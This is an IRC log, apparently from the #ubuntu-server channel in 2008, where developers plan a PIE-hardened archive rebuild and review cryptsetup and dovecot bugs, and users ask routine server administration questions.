<NCommander> My first thought when I looking at the MySQL build failures is that PIE was generating bad code, not slowing down MySQL to the point of failing its test suites
<kees> NCommander: I'd agree with that.  When I narrowed down the mysql issue, it was segv'ing the server in exactly _1_ test.
<kees> which, I find to be rather scary.
<NCommander> Like I said, I've always been weary of PIE with GCC
<kees> yeah, hence this gradual approach.
<NCommander> And Microsoft went as far as disallowing position independent code with their compilers
<kees> on the other hand, lots of stuff has been PIE in RHEL/Fedora for a while now.
<NCommander> (its sorta amazing/scary how they implemented shared libraries without PIC code)
<NCommander> obviously not mysql :-)
<NCommander> TBH, mysql does some rather stupid code tricks, so it doesn't shock me so much that you get issues with it
<kees> for intrepid+1, I'm pondering enabling PIE for all of x86_64 and seeing what burns down.  I suspect it will be my house, care of doko.  :)
<NCommander> kees, I've got an Ubuntu x86_64 buildd setup
<NCommander> Once the archive enters final freeze, I don't mind running the entire archive compile end to end
<NCommander> (probably will take a week or two to finish)
<kees> NCommander: two people doing it is better than one.  :)  I've not tried doing universe, but I've done full main rebuilds in about 2 days.
<kees> the issue I may hit is that of space.  I hadn't been saving the .debs
<NCommander> Its just a matter of catching build failures
<NCommander> But if you want, I have a 500GB hardddrive
<kees> this time, if I save the debs and shove the updates into a VM, it'll be interesting to see the results.
<NCommander> and a dak installation already on it :-)
<kees> heh.
<NCommander> Yeah, the only "fun" part with dak is setting overrides
<NCommander> But I can just grab the ones from Debian
<kees> yeah
<NCommander> When do we hit the freeze date?
<NCommander> (or would you like to rebuild the archive sooner then that ;-))
<kees> last thursday.  ;)
<NCommander> I mean final freeze/hard freeze
<kees> looks like oct 30
<NCommander> That far away?
<NCommander> Damn
<kees> https://wiki.ubuntu.com/IntrepidReleaseSchedule
<NCommander> kees, do you use Soyuz as your buildd, or the Debian w-b/buildd combo
<kees> I actually use sbuild for local testing
<NCommander> for rebuilding the entire archive?
<NCommander> (buildd uses sbuild internally)
<kees> yeah.
<NCommander> Ouch
<NCommander> I'm not that crazy
<kees> it's a pretty simple script.
<NCommander> I actually use a wanna-build/buildd/sbuild combo
<NCommander> Yeah, but no load balancing ;-)
<kees> I just beat my desktop to death for a day or so.  :P
<kees> usually start it friday night
<NCommander> yeah, but if you have someone helping oyu with universe ...
<NCommander> kees, well, its an interesting experiment at any rate which I'd like to help do ;-)
<NCommander> I've got to run, but we'll talk later
<kees> NCommander: cool, thanks, cya
<NCommander> kees, you still around?
<kees> oops, he vanished.
<NCommander> kees, you still around?
<NCommander> kees, :-P
<NCommander> -NickServ- You may not ghost yourself.
<NCommander> Nickserv is lagging
<kees> NCommander: yawp
<NCommander> would you like to write up a spec on building amd64 with PIE and see how the archive explodes?
<kees> NCommander: sure, I'll certainly do that when we start the spec-writing surge for intrepid+1
 * NCommander would like to see the hardening also tested on ia64, sparc, and powerpc
<NCommander> Oh, so you want to wait until after intrepid is released for this experiment?
<kees> NCommander: I suppose I could write the spec any time.  :)
<kees> NCommander: I'll do it this week and blog about it.
<NCommander> Well, I'll write the spec, but I mean when would you want to do the experiment
<NCommander> (two computers could grind through main in less than a day, universe will take longer though)
<kees> experiment could be done any time.
 * NCommander pops up the wiki
 * NCommander cricks neck
<NCommander> I've got amd64, and powerpc hardware. Want to donate some sparc to the cause
<kees> I'm really only interested in amd64 myself.
<NCommander> I'm just noting the more common server architecturs
<kees> NCommander: so should I write the spec, or are you already doing it?
<NCommander> Assuming I can kick the wiki alive
 * kees nods
<NCommander> kees, think we could convience Canonical to let you have intrepid+1 build with PIE/hardening on by defualt?
<kees> NCommander: well not specific to Canonical, but that's the goal.
<kees> NCommander: I'm adding the spec now.. (on LP)
<NCommander> I'm writing the basis of the wiki entry, you'll have to flesh it out somewhat
<NCommander> Maybe ask Canonical to add a new distribution - Ubuntu Hardened, with everything compiled with hardened wrapper
<Deeps> hardbuntu
<kees> NCommander: the otherhead for that is huge.  besides, everything is compiled with all the hardening options (excepting PIE) in intrepid.
<NCommander> I didn't know that
<NCommander> Deeps, I think a less suggestive name would be in order ;-)
<kees> NCommander: yeah, that was my goal for intrepid: https://wiki.ubuntu.com/CompilerFlags
<NCommander> kees, it would just be additional load on the buildds , but it shouldn't be so hard to get launchpad extended in such a matter
<kees> NCommander: okay, BP registered: https://blueprints.launchpad.net/ubuntu/+spec/64bit-pie-by-default
<kees> NCommander: it would double the size of the amd64 archive.  :P
<NCommander> What's another 20GB?
<NCommander> (which is the size of the amd64 archive)
<kees> it could be done via PPA too
<NCommander> yay, 1GB limitations :-)
<NCommander> And it would require manually tweaking each control file, I just want to install hardening-wrapper right into the chroot so I don't need to manually set it
<kees> oh, is there really a size limit on PPAs?
<arakthor> what does PIE do?
<NCommander> kees, 1GB
<NCommander> arakthor, it causes code to be position independent
<kees> arakthor: makes the program relocatable in memory.  then combined with kernel ASLR, the program loads to different locations each time.
<arakthor> gotcha
<kees> arakthor: that makes it harder to exploit a memory corruption vulnerability.
<arakthor> yup
<NCommander> kees, https://wiki.ubuntu.com/PIEExperimentSpec#preview
<NCommander> The problem is PIE historically has had some issues in GCC, and due to the "design" of the x86 architecture, has a speed hit on that architecture
<NCommander> (x86_64 is spared from that issue by being 64 bit and having more general purpose registers)
<didrocks> jdstrand: you don't delete $testdir/testarea if we interrupt your test script. Is it what you want? (hum, you remove it at the end, so, ok, you don't want to push your branch it if you had to interrupt the script. That makes sense.)
<NCommander> kees, how fast is your amd64?
<jdstrand> didrocks: yes
<kees> NCommander: 2.40GHz 4-way with 8G RAM
<NCommander> kees, slaughters my box
 * jdstrand drools over kees' RAM
<NCommander> 2.30Ghz dual core, 2G RAM
<kees> NCommander: my job is doing lots of compiles.  :)
<NCommander> kees, that machine might have a qmail security bug on it ;-)
 * kees lucky and does not run qmail :)
<NCommander> kees, well, you can use rebuildd, or if you want to load balance and get people to help buildd, setup a buildd cluster ;-)
<fReAkY[t]> hi all. i have set up an apache2 ssl cert using this guide: https://help.ubuntu.com/community/forum/server/apache2/SSL but the newly created cert is only valid for 1 month. how can i change that to be valid for 1 year?
<NCommander> kees, rebuildd gets you something nice like this: http://builder.ubuntuwire.com:9998/dist/intrepid/arch/i386
<NCommander> actually, rebuildd has load balancing :-) (more than one host can build at a time)
<gegema> Is editing /etc/network/interfaces the best approach to setup my ubuntu server to use a static IP (instead of DHCP)?
<arakthor> I think it is
<jmedina> gegema: always use static in servers, if your dhcp server goes down  your users are not going to be able to reach the server, unless you use a really big lease time, but it is hard
<gegema> Will do - Thanks!
<fReAkY[t]> hi all. i have set up an apache2 ssl cert using this guide: https://help.ubuntu.com/community/forum/server/apache2/SSL but the newly created cert is only valid for 1 month. how can i change that to be valid for 1 year?
<NCommander> fReAkY[t], you can't, you need to generate a new certificate
<fReAkY[t]> yea but how?
<fReAkY[t]> i dont know the command line - man make-ssl-cert doesnt have any -days commandline option like apache2-ssl-certificate
<NCommander> I don't remember off the top of my head
<didrocks> jdstrand: ok, I think I saw pretty much everything in your ufw test (I love reading shells). Very impressive work for testing regressions, congrats! :) (the only think I didn't understand is the dry-run option, but it is ufw intern model). I will try to make something in the few days regarding case sensitiveness testing. I think there is no much work to do as your architecture is very straightforward and flexible
<jdstrand> didrocks: great, thanks! :)
<didrocks> so, it's getting late. See you tomorrow :)
<jdstrand> didrocks: the --dry-run is really just to see what rules would be added to the firewall. it is useful in regression testing too (as you've seen)
<jdstrand> didrocks: have a great night!
<didrocks> jdstrand: ok, understood. Thanks a lot. You too :)
<NCommander> kees, I modified my pbuilder instance to use hardening wrapper, I just need to tweak it to always enable, right?
<kees> NCommander: do you have instructions for it?
<NCommander> kees, pbuilder login --keep-after-login
<NCommander> ;-)
<kees> heh
<NCommander> $default{'DEB_BUILD_HARDENING'}=0;
<kees> well you need to export DEB_BUILD_HARDENING=1 as well
<NCommander> I just want to set that to 1 to make it do the right thing
<kees> righto
<NCommander> PIE already set ot one
 * NCommander saves
<kees> can you add details to https://wiki.ubuntu.com/Security/HardeningWrapper
<NCommander> Ok, pbuilder is updated
<NCommander> Now to just start rebuildd
 * NCommander figures out where to send the mail
 * NCommander figures out how to initalized rebuildd database
<Derander> Is it possible to create an ssl certificate for multiple domains?  (I'm trying to set this up for a dovecot/postfix mailserver)
<jmedina> Derander: you can use the same cert for virtual domains, but you will get browser warnings
<Gargoyle> Derander: Not that I know of. But why don't you just have a single name (mail.myserver.boo)?
<NCommander> kees, good news, it seems ubuntuwire will do the rebuild
<kees> NCommander: nice.  :)
<NCommander> kees, there hardware takes 10 days to rebuild universe
<NCommander> So probably 12 for main+universe
<kees> NCommander: that rocks!  :)
<kees> NCommander: will you add the repo details to the wiki page?
<NCommander> We won't publish the repo until the rebuild is done
 * kees nods
<NCommander> Limitation of ubuntu wire
<NCommander> (I'm just going to sign all the changes and shove them somewhere)
<NCommander> That being said, if there is enough interest in an intrepid-hardened, it may be worth actually maintaining it and such beyond just doing a one-shot experiment
<NCommander> brb/bbiab
<kees> NCommander: might want to call it "intrepid-pie" though, since intrepid itself is pretty well hardened (just lacks PIE)
<hads> Ibex pie? :)
<NCommander> and now I'm back
#ubuntu-server 2008-09-03
<uvirtbot> New bug: #264155 in mysql-dfsg-5.0 (main) "fails "subselect" on i386 testsuite runs with segv when compiled with PIE" [Undecided,New] https://launchpad.net/bugs/264155
<wobbiebobbie> hi room
<wobbiebobbie> will a dell dimension 5150 dual core 145gig harddrive make a good server
<owh> For what?
<wobbiebobbie> I want to make a server for my family who are out of state to access for picture sharing
<wobbiebobbie> this 10meg email limit is killing me
<owh> How much RAM for this beast?
<wobbiebobbie> well it can hold 4gigs
<wobbiebobbie> I was going to put 2 500gig hard drives in it
<kgoetz> i think what you need is a p2 433, with 256mb of ram, and adsl2 or greater
<wobbiebobbie> is that all
<wobbiebobbie> will that hold ubuntu server
<kgoetz> bump it to a 667 with 512mb of ram if your hosting images+thumbnails in a website
<wobbiebobbie> and run it
<owh> wobbiebobbie: So can I, but seriously, you need to think about what use it's going to be put to. If you're going to run 17 zillion web-apps, then you need a big machine, but if it's going to be doing bugger all, then it can be the size kgoetz suggests.
<wobbiebobbie> I just like to set it up to share pictures and file with my family though a FTP
<kgoetz> let ftp die. use some other protocol
<wobbiebobbie> like what I dont know
<wobbiebobbie> I have ubuntu gusty but have not used ubuntu server
<kgoetz> http at a pinch, ssh if posible,
<kgoetz> http wouldnt be such a bad idea, imho.
<wobbiebobbie> is there a how to for ubuntu server
<kgoetz> theres a server guide on help.ubuntu.com
<wobbiebobbie> thanks I will check it out
<wobbiebobbie> heck I was going to buy a server from dell thanks guys
<kgoetz> heh. np. feel free to ask if you need a hand (afer checking th docs :P)
<wobbiebobbie> ok thanks
<owh> kgoetz: You know we're going to get more questions about setting up a server to share photos with the family don't you :)
<kgoetz> owh: how hard can it be? intall ubuntu server -> use lamp task -> log in to server -> mkdir public_html -> photos in public_html -> ??? -> profit
<owh> ROTFL
<owh> kgoetz: So how's sunny ADE?
 * owh hasn't opened the curtains here yet.
<kgoetz> owh: sunny, for two days in a row
<owh> Whoa, there's sun here too!
<kgoetz> :O
<kgoetz> quick, hide before it sees you!
 * owh blinks in the bright light.
 * kgoetz is at work battling php/mediawiki/ldap (and all that it entails)
<owh> Oooh, let me know what you think about mediawiki when you're done. I'm looking at using it for a project or six.
<kgoetz> making it use htauth is easy (then use apache to backend to ldap), but using mediawikis ldap plugins ... not so easy. i expect today is a day of doco reading and code poking for me
<kgoetz> other then the php thing, i quite like mediawiki
<owh> kgoetz: I've been playing with PHP for longer than I care to admit. I think it was still called FI, or some-such, PHP2.
<kgoetz> hehe
<docta_v> if i add a new SATA device to a live system is there a way I can make the kernel/driver rescan the bus?
<owh> docta_v: Under dapper I played with rescan_scsi_bus or some such script, but it was never very successful.
<docta_v> owh: cool.. i don't think it's going to work on this system
<docta_v> in dmesg it says it shutdown the port
<docta_v> i'm emailing the devs and telling them to get off the box tomorrow at lunch so i can take it down
<owh> docta_v: Really it should be plug and detect and I've been stumped on how to achieve that.
<docta_v> owh: well you need the right controller in addition to the right kernel, etc.
<docta_v> my controller is silicon images
<docta_v> and all of their hardware is garbage so i'm assuming that's why it doesn't work
<owh> :)
<docta_v> i think you can do scsiadd -s
<docta_v> provided your controller handles the hot-plug
<owh> docta_v: I recall that command, but not the outcome, other than that it didn't work at the time. Something to do with a timeout IIRC, but that might be a reflection on poor hardware as you already commented on.
<stevet> Hey guys I'm having an issue with installing x11 on an old machine running server 8.04
<stevet> I get the error : Framebuffer bpp 32 not supported for this chipset
<maestrolinux> los invitamos a #linux-para-todos >>>  Un canal libre para la Gente Libre, donde tratamos de ayudar sin tantas reglas, donde esta permitido expresarse, copiar y pegar, y ser un poco mas abierto. donde no importa un pais, sino la libertad de usar Linux.
<owh> maestrolinux: English around here...
<lukehasnoname> a free route for free people, where we can try to help without as much regulation, where one is permitted to express, copy and paste, and be a little more open, where country is not important, "sino" the freedom to use Linux.
<Deeps> sino, but rather
<lukehasnoname> ah
<lukehasnoname> So, I had this idea, about having a setup in tasksel to let people choose what scripting backend to have on their LAMP: PHP, Python or Ruby(oR), with the click of a checkbox. Is something similar to this being worked on, or should I formally bring this up somewhere?
<Deeps> missing the other P (Perl)
<lukehasnoname> ya, sry, I'm not a perl guy
<lukehasnoname> but yes
<owh> lukehasnoname: That's an excellent idea.
<owh> lukehasnoname: Send an email to the list and ask for some other opinion would be my first recommendation.
<kraut> moin
<lukehasnoname> moin
<elnewb> What is "Framebuffer bpp"?
<_ruben> bits per pixel i'd guess
<_ruben> and thus the color depth of the pixels of your framebuffer/console
<elnewb> Ah k thank you
<LiniX> Hi., I have problem about mail server ., Can you help me?. Please
<_ruben> no, we cant, since we dont know what the problem is
<LiniX> Ohh.....
<LiniX> I use courier-maildrop from apt-get. and i create user vmail  for maildrop
<LiniX> when i use maildrop from root accout it say " maildrop: Changing to /home/vmail/npt.com" and it right!
<LiniX> but when i use maildrop from vmail account, it say "maildrop: Changing to /home/vmail" and i wrong
<LiniX> i am forgetful , i use courier-authlib-ldap. and i get user account from ldap.
<LiniX> :-(
<LiniX> so i try change vmail 's home directory
<LiniX> export HOME = /
<LiniX> and use maildrop again, it say "maildrop: Changing to /"
<LiniX> i don't know where is make problem
<LiniX> - -
<ajmitch> sorry, I've only used dovecot & exim for mail, I can't help
<LiniX> thank you , no at all :-)
<elnewb> Even though this is a more general ubuntu question.  How do I get the "add packages" button into the Applications menu after I installed gnome on ubuntu server?
<siretart> elnewb: I'd guess 'sudo apt-get install gnome-app-install'
<elnewb> Seems to be working away thank you
<elnewb> Works
<jimcooncat> looking into monit, what other similar packages are out there please?
<moldy> hi
<moldy> how do i use rsnapshot on ubuntu? i need a workaround for that .gvfs fuse crap :(
<moldy> using "exclude" in rsnapshot.conf does not work -- rsync still readlink()s the stuff and errors...
<moldy> ... so you are basically forced to ignore all errors. crap crap crap.
<jimcooncat> moldy: that's sad to hear. I use it on an older system, and will be upgrading to hardy soon
<moldy> then you're in for some trouble
<moldy> i now found out: using "exclude .gvfs" rather than "exclude .gvfs/" works around the problem
<jimcooncat> can you just turn off gvfs?
<moldy> not easily, afaik
<moldy> root not being allowed to read stuff ist just plain idiotic...
<moldy> what are the fuse guys thinking...
<jimcooncat> fuse guys or nautilus guys?
<moldy> afaik, it's a fuse thing
<moldy> fuse mounts are only readable by the owner, not by root. idiotic.
<jimcooncat> To lift this restriction for all users or for just root, mount the filesystem with the "-oallow_other" or "-oallow_root" mount option, respectively. Non-root users can only use these mount options if "user_allow_other" is specified in /etc/fuse.conf.
<jimcooncat> moldy: found above on fuse wiki. But I only understand half of it
<moldy> jimcooncat: hm, i think i understand it
<moldy> what i don't know is where/how gnome issues the mount command
<moldy> and where you can manipulate it to include -oallow_root
<moldy> there also is a bug in the ubuntu bts about this
<jimcooncat> moldy: maybe you could manually mount it?
<moldy> it's somehow magically mounted upon login or something like that
<moldy> using "exclude .gvfs" is the best workaround i found so far
<moldy> i can see why the fuse guys are doing this for *some* cases (remote mounts)
<moldy> but in the usual case it's just idiotic... the default should be changed
<sommer> morning all
<Kamping_Kaiser> hi mate
<Gargoyle> hello
<siretart> kirkland: if you have some time, could you please review the patch that we have in cryptsetup for the additional 'waiting-for-root' loop? http://paste.ubuntu.com/43031/
<siretart> kirkland: https://bugs.edge.launchpad.net/ubuntu/+source/cryptsetup/+bug/251164/comments/6 claims that the current approach will break the failure hooks
<uvirtbot> Launchpad bug 251164 in cryptsetup "crypdisk boot scripts do not wait properly for source devices to appear" [Undecided,New]
<siretart> kirkland: I also think that the current patch is not optimal, so I'd like to have some expert's opinion on this
<uvirtbot> New bug: #264306 in dovecot (main) "Panic: file sieve-cmu.c: line 88 (unfold_header): assertion failed: (str[i] == ' ' || str[i] == '\t')" [Undecided,New] https://launchpad.net/bugs/264306
<zul> morning
<reya276> morning
<reya276> should this be present in a users directory "/home/karla/ /crond/192.168.1.79.user2:"
<reya276> I had a virus infect this particular user email box  called
<reya276> Linux/Rst.a
<kirkland> siretart: I'm happy to review the patch, but you're generous in calling me an "expert" ;-)
<mdz> zul: are you asking for my dovecot.conf and sieve.conf because you believe they are necessary to diagnose the bug, or just as a matter of course?
<mdz> zul: because I think I understand the problem already and it has nothing to do with my configuration
<zul> mdz: thinking about it now just the sieve.conf
<siretart> kirkland: :-)
<kirkland> siretart: i'm reviewing it now
<mdz> zul: you can reproduce it with a one-line sieve.conf as follows:
<mdz> zul: if header :contains "Subject" "blahblahblah" { discard; }
<siretart> kirkland: in case it's useful for you, you might want to checkout the bzr branch on launchpad. it has the debian source imported in its history, so you can compare files against the version in debian like you can see in the paste
<zul> mdz: thanks
<siretart> kirkland: thanks!
<zul> mdz: will try to get it fixed today
<kirkland> siretart: can you give me the lp URL?
<siretart> kirkland: apt-cache showsrc cryptsetup ;)
<siretart> Vcs-Bzr: https://code.launchpad.net/~ubuntu-core-dev/cryptsetup/ubuntu
<mdz> zul: I believe the problem is that the subject contains MIME-encoded newlines
<mdz> Subject: =?windows-1255?Q?=E0=E9=EE=E5=EF_=E0=E9=F9=E9_=EC=E9=F8=E9=E3=E4_=E1=E8=E5=E7=E4_=E1=EE=F9=F7=EC=0D=0A?=
<siretart> or 'bzr checkout lp:~ubuntu-core-dev/cryptsetup/ubuntu', if you intend to commit
<mdz> note =0D=0A
<zul> mdz: there might be a fix in the dovecot mercurcial repos already I just have to test it out
<kirkland> siretart: I'm inclined to agree with ceg, though, that cryptroot should be able use the failurehooks like we recently did for md
<kirkland> siretart: the panic -r call is what starts the failure hooks
<siretart> kirkland: I'm not familiar at all with the failurehooks. Unless you can point me to documentation how it is supposed to work, could you perhaps give the cryptroot hook a shot to make it work gracefully with the failurehooks?
<kirkland> siretart: that's what I'm looking at now ;-)
<siretart> :-)
<kirkland> siretart: for documentation, see the comment in /usr/share/initramfs-tools/scripts/functions:try_failure_hooks()
<kirkland> siretart: (assuming you're on an up-to-date Intrepid system)
<kirkland> siretart: otherwise, initramfs-tools-0.92bubuntu10/scripts/functions
<siretart> aah, I see
<kirkland> siretart: so you'd put some magic in /tmp/mountroot-fail-hooks.d/cryptroot
<w8tah> where is the doc that tells me how to upgrade from 6.04lts to hardy lts?
<w8tah> for server -- i cant seem to put my keys on it today
<kirkland> siretart: okay, and for your example, apt-get source mdadm; vi mdadm-2.6.7/debian/initramfs/init-premount
<kirkland> siretart: you'll see at the bottom of that script it "installs itself" with add_mountroot_fail_hook "10-mdadm"
<kirkland> siretart: and note that it exits "0" when it thinks that it has done some good, "1" otherwise
<ScottK> lamont: I see in debian/changelog you added my filter/policy server scripts to postfix, but I don't actually find them when I inspect the .deb?
<ScottK> And with that, I run out the door for several hours.
<lamont> meh
<lamont> dpkg -L postfix| grep add
<lamont> /usr/sbin/postfix-add-policy
<lamont> seems there for me....
<lamont> heh.  OTOH, I guess I should deliver manpages, too. :-(
<lamont> in section 8, not 1
<siretart> kirkland: I don't know if I'll have time to test and implement the failure hooks myself for cryptsetup. if you have some spare time, I'd really appreciate it if you would do it
<kirkland> siretart: I'll see what I can do......
<kirkland> siretart: can you detail how to reproduce the failure case?
<kirkland> siretart: such that I can test the work I would theoretically do for you?
<siretart> kirkland: AFAIUI boot from root on usb would trigger it. I never experienced that personally yet.
<kirkland> siretart: boot from crypted root on usb, you mean?
<siretart> yes
<kirkland> siretart: you think usb flash disk is sufficient?
<kirkland> siretart: i have a few of those lying around ;-)
<siretart> kirkland: if it has an on board ide/sata controller, then probably not. a normal usb stick should do it however
<siretart> kirkland: a really slow scsi control should trigger it as well, though
<siretart> the point of the excercise is to have a really slow controller for the root device
<kirkland> siretart: sorry, yeah, i mean normal usb stick
<siretart> yes, something like that should trigger it. it depends a bit on the usb controller, but usually, they take a loooooong time to initialize
<uvirtbot> New bug: #264374 in bacula (universe) "package bacula-director-pgsql 2.2.8-5ubuntu7 failed to install/upgrade: subprocess post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/264374
<bogey-> that bug is now owned by carl
<wayneandleanne> can somebody tell me how east it is to setup software raid on ubuntu server?
<soren> Quite.
<wayneandleanne> soren: how quite?
<ScottK> I was going to say it depends on where you live.
<soren> wayneandleanne: Depends. Do you have a unit of measurement?
<soren> wayneandleanne: It's really quite easy.
<lukehasnoname`> Is it 'open a jar of pickles' easy, or 'installing KVM' easy?
<wayneandleanne> ok, i have a machine i want to run ubuntu server on (dns, samba, asterisk,etc) for home use in has a 40 gb drive i am going to install server onto and a pair of 80's i want to mirror but i dont know how to
<soren> In the installer, for each partition you want to mirror, you create a partition on each disk.
<soren> You mark this as a "raid member".
<soren> Once you've done that you choose to "configure software raid".
<soren> In there, you create the raid devices and add your filesystems to that.
<soren> That's about it.
<wayneandleanne> that easy?
<wayneandleanne> thanks
<soren> np
<wayneandleanne> soren: is it basically the same steps to add extra hd's at a later date?
<foolano> hi there!
<lukehasnoname`> yo
<nealmcb> nijaba: this may scare some people off: "The record kept of your survey responses does not contain any identifying information about you unless a specific question in the survey has asked for this."   do we want to clarify that (as I assume) such revealing responses will only be used for aggregate statistics and not be combined with other responses in ways that would compromise privacy?
<nijaba> nealmcb: did you see the link to the privacy policy?
<nealmcb> yes - but many may ignore that...
<nijaba> nealmcb: well, if they are scared and don't read the privacy policy, I guess they won't take the survey and that's it....
<uvirtbot> New bug: #264418 in samba (main) "net usershare add : read only (post 43674)" [Undecided,New] https://launchpad.net/bugs/264418
<nijaba> nealmcb: the truth is, I am not sure how to prevent this text from appearing
<nealmcb> nijaba: yeah - gotta warn them.
<nealmcb> If any better ways to defuse that occur to me I'll pass them along....
<nijaba> thnaks
<nijaba> thanks too
 * nealmcb wonders if thnaks taste good
<nijaba> must be a snack with a french accent
<leonel> ScottK: is someone in pkg-debian working on this : http://paste.ubuntu.com/43105/  ??
<ScottK> leonel: Not that I've heard.  They are still just getting started, so I think we should proceed as normal (you're welcome to join BTW, I've just not caught up with you to say so).
<leonel> ScottK:  count me on ..
<leonel> ScottK: I'll start checking diffs for those 2  later this day or tomorrow
<ScottK> Thanks.
<uvirtbot> New bug: #264427 in openldap (main) "openldap user not in ssl-cert group" [Undecided,New] https://launchpad.net/bugs/264427
<leonel> ScottK: clamav-0.94 introduced libclamav.so.5 ...
 * delcoyote hi
<jpds> mathiaz: The server guide is at the same place as the other Ubuntu documentation?
<mathiaz> jpds: yes
<jpds> mathiaz: OK; I will have a crack on it tomorrow.
<mathiaz> jpds: we trying to figure out a way to move it around - but it's not done yet
<mathiaz> jpds: so you'll have to checkout all of the documentation which can take some time the first time
<jpds> mathiaz: I know, I've done it before. I used to write on the PackagingGuide long ago.
<Laleh> hello all, I have a problem for two weeks, I installed a pptp vpn server to my company, I use dydns to keep track of the ip,  I have three servers www, dns, and samba, the router is the gateway, when my clients connect, they suffer from a very slow connection because they use my dns instead of their own one
<ScottK> leonel: Yep.  We get to rebuild and fix all the rdepends again.
<didrocks> jdstrand: hi. From your tests, it is not possible to define an Apache and on ApachE profile. But this is possible and can work when you do manual testâ¦ (I handled it specifically in my code)
<didrocks> jdstrand: ok, my bad, I adapted the result file. The only thing is that all profiles in tests/$class/$subclass/orig/* are the same: not symlink but hard copy. Why? (I have to copy my profile changes in every */orig directories)
<jdstrand> didrocks: actually, it should be a symlink to tests/defaults
<jdstrand> didrocks: but it seems bzr isn't doing that right (or I'm not)
<jdstrand> (probably the latter)
<didrocks> ok, so, for the moment, I will try to retablish this
<jdstrand> didrocks: you are working off the bzr branch, correct?
<didrocks> I am adding some tests (I will have to stop because of giving a talk in -classroom), but I will keep you in touch
<didrocks> for the tests? I am working in my branch, why?
<jdstrand> didrocks: I was just trying to figure out if it was 'bzr export' or not
<jdstrand> I'll look into it
<didrocks> ok, I will keep every changes in a dedicated place
<ScottK> mathiaz: Are you tracking updates to the Server seed or is that assigned to someone else?
<kirkland> mathiaz: hey, are you around?
<mathiaz> ScottK: I don't know of anyone assigned to track seed updates for the server team - any core-dev can change the seeds AFAICT.
<mathiaz> kirkland: yop :)
<kirkland> mathiaz: no worries, i think kees answered my questions, thx!
#ubuntu-server 2008-09-04
<nxvl> soren: ping
<leonel> ScottK: django 1.0 has been released, the next step is wait for debain to make the package ?
<ScottK> Or make one yourself.
<chmac> Anyone know what package `dig` is in?
<chmac> dnsutils :)
<chmac> When I try to install dnsutils it tells me I also have to install bind9-host. I just want the dig command line application, is that necessary?
<chmac> Is there another way to query mx records?
<hads> bind9-host is tiny
<soren> nxvl: What's up?
<nxvl> soren: you use mutt, don't you?
<soren> I do.
<nxvl> with imap?
<soren> Sometimes.
<soren> I mostly use offlineimap, though.
<nxvl> mm
<nxvl> the question is: can i have my imap folders using mutt?
<soren> Sure.
<nxvl> and i need to declare all of them in the muttrc?
<nxvl> or there is another way?
<soren> I think so.
<soren> offlineimap fixes that, though.
<nxvl> that's a package?
<nxvl> or a configuration?
<soren> package
<nxvl> a package
<nxvl> got it
<nxvl> i need to read more on the topic
<nxvl> i'm using a mouse (a real one) after 4 months and i still put my finger on the trackpoint
<nxvl> i don't get use to it
<nxvl> :S
<nxvl> going to bed for now
<soren> Ok, goodnight!
<soren> :)
<nxvl> soren: i will ping you in the morning (afternoon for you, or something) so if you have any documentation, please have it closer :D
 * nxvl HUGS soren 
<soren> nxvl: Sure thing :)
<riham> Hi all,I have a question about how to reset the timeout for the connections in FIN_WAIT1 state?I know that we can change timeout for connections in FIN_WAIT2 state by changing tcp_fin_timeout, but what about FIN_WAIT1 state ?
<incorrect> where can i find the docs for intrepid?
<mdz> soren: any reason we shouldn't change the default memory size in KVM to something which allows our own installation CD to run? :-)
 * delcoyote hi
<soren> mdz: It's 128 now, right?
<mdz> soren: yes
<soren> mdz: I don't see any reason not to change it to whatever we feel like. We advise everyone to use libvirt which doesn't rely on any particular defaults, so we should be free to do whatever.
<soren> mdz: What do you feel like instead? 256? 384?
 * soren is a bit out of touch with the current requirements on the desktop, I'm afraid.
<mdz> soren: 256 should work with current intrepid, 384 for 8.04 and earlier
<mdz> soren: the libvirt tools don't have any defaults?   so you have to specify the memory size for every VM?
<mdz> I must say I just use kvm myself and am happy doing it
<soren> mdz: Oh, yes, the libvirt tools have defaults. They just don't rely on any particular defaults in kvm itself, which I thought was what we were talking about.
<soren> mdz: I can change the defaults for libvirt-generated instances as well.
<soren> s/as well/instead/ perhaps :)
<mdz> soren: is libvirt smart enough to guess which OS you're trying to boot and select an appropriate default?
<soren> mdz: No. You specify it when you're creating the vm.
<soren> mdz: The amount of memory is not currently one of the per-os nor per-distro settings in virtinst, so it's a bit more involved than just changing a number.
<soren> mdz: Could you file a bug against virtinst about this?
<mdz> soren: I'm not that interested, was just curious about the state of the art
<soren> mdz: Heh :) Ok.
<_ruben> strange .. initializing a sw raid10 .. im only seeing full speed (i think) reads on the disks, no writes
<_ruben> well .. very very little writes
<acemo> does ubuntu-server automagicly lets cool'n'Quiet work or do i have to install something for that?
<soren> acemo: cool'n'quiet?
<acemo> amd's stuff to lower the speed of the cpu when the cpu isn't bussy
<KillerKiwi2005> anybody here know about mod mono ?
<soren> acemo: You probably want powernowd
<acemo> soren: alright thanks
<spiekey> howdy!
<spiekey> has anyone an idea why my mails here get still logged into /var/log/messages?
<spiekey> http://pastebin.com/m212e46ee  ?
<soren> spiekey: Because your f_syslog only filters out auth and authpriv facilities?
<spiekey> well, but filter f_messages should do.
<spiekey> f_message: level(info,notice,warn) and not facility(auth,authpriv,cron,daemon,mail,news);
<soren> Oh, sorry, I somehow managed to misread your question.
<spiekey> no problemo ;)
<spiekey> currently i log mail stuff into syslog, messages and mail.*
<spiekey> this is way too much :P
<spiekey> i want the mail stuff to be in mail.* only
<zul> spiekey: modify your /etc/syslog.conf and you can customize it how you want
<spiekey> zul: i want to use syslog-ng
<zul> spiekey: then modify your syslog-ng config file and customize it how you want
<spiekey> thanks for this tips
<spiekey> guess what i am trying to do :P
<spiekey> i have tried to customize my syslog-ng.conf but its not working as i expected. Thats why i am here for :)
<mdz> soren: what is "kvm: emulating exchange as write" about?
<ScottK> soren: IIRC mjg59 had a blog post recently about CPU throttling not necessesarily saving power.
 * ScottK goes to see if he can find it.
<soren> mdz: It's nothing to worry about. IIRC, it's about an instruction that needs to be emulated (cmpxchg), but kvm uses a write instruction instead, but since the pages in question should be read-only at that time, it's not a problem.
<ScottK> soren: This is the one I was thinking of: http://mjg59.livejournal.com/88608.html
<ScottK> So I guess I'd like to make sure powernowd is really going to help before we ship it.
<soren> ScottK: interesting.
<ScottK> Yeah.
<soren> ScottK: He does point out, though, that the ondemand governor is a good thing. That's mostly what the powernowd package sets.
<ScottK> OK.  I don't have a lot of knowledge, just wanted to make sure it was considered since it seems an area where the 'obvious' answer isn't always the correct one.
<alpha232> I just recently installed -server kernel and it seems to hang after saying  "Starting Conexant HSF softmodem"
<alpha232> i don't have one of those installed, and the login prompt never appears
